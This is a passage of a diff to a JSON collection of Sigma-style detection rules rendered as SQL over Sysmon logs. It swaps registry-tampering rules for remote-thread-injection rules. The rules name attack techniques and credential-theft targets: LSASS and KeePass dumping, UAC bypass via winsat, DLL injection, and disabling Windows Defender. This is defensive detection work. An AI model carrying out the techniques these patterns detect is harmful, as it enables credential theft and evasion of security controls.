changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", - "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", - "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", + "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Administrator actions" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" - ], - "filename": "registry_set_disable_windows_defender_service.yml" - }, - { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Office Security 